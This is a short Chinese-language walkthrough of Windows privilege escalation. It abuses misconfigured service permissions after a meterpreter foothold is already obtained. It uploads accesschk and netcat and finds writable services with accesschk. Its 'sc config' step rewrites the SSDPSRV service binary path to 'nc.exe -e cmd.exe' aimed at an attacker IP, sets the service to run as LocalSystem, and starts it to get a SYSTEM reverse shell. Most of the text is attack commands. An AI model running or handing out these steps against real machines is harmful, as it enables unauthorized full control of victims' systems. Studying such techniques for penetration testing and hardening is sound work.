windows下一种提权方法

利用不正确文件和服务的权限设置

需要用到的工具：

1、icacls（适用于win7及以上系统）/cacls (适用于winxp及win2000系统) – 系统默认工具，用于检查某个具体的文件夹或者文件的权限配置信息

2、accesschk (sysinternals工具集之一) – 用于检查一个具体的用户或者组对于文件，目录，注册表，全局对象以及windows服务的权限信息

前提：已经获得meterpreter

首先利用meterpreter上传工具

meterpreter > upload accesschk_xp.exe c:\\xxx\\accesschk_xp.exe

meterpreter > upload nc.exe c:\\xxx\\nc.exe

执行accesschk来检查当前用户xx具有写权限的windows服务，因为这些服务配置了过高的权限将有利于我们来实现提权操作。

C:\xx>accesschk_xp.exe /accepteula -uwcqv 用户名 * > ack.txt

找到了2个满足条件的windows服务，分别是SSDPSRV和upnphost。任意选择一个服务检查一下，如：SSDPSRV

C:\xx>accesschk_xp.exe /accepteula -ucqv SSDPSRV

可以发现这个服务可以使用NT AUTHORITY\SYSTEM权限来启动我们指定的二进制文件，也就是说我们可以以SYSTEM权限来反弹一个shell继而完成提权操作，具体操作命令如下：

C:\xx>sc qc SSDPSRV

SC命令是XP系统中功能强大的DOS命令,SC命令能与“服务控制器”和已安装设备进行通讯。SC 是用于与服务控制管理器和服务进行通信的命令行程序。

sc qc 服务名——查看一个服务的配置信息

C:\xx>sc config SSDPSRV binpath= "c:\inetpub\nc.exe -nv 10.11.0.90 9090 -e cmd.exe"

sc config——修改注册表和“服务控制管理器”数据库中服务项目的值。

binpath= BinaryPathName——指定指向服务二进制文件的路径。

C:\xx>sc config SSDPSRV obj= ".\LocalSystem" password= ""

obj= {AccountName | ObjectName}

指定运行服务将使用的帐户名，或指定运行驱动程序将使用的 Windows 驱动程序对象名。默认设置为 LocalSystem。

C:\xx>sc config SSDPSRV start= "demand"

start= "demand"——指定是必须手动启动的服务

C:\xx>net start SSDPSRV

攻击机监听端口，若开启服务，则获得LocalSystem
权限的shell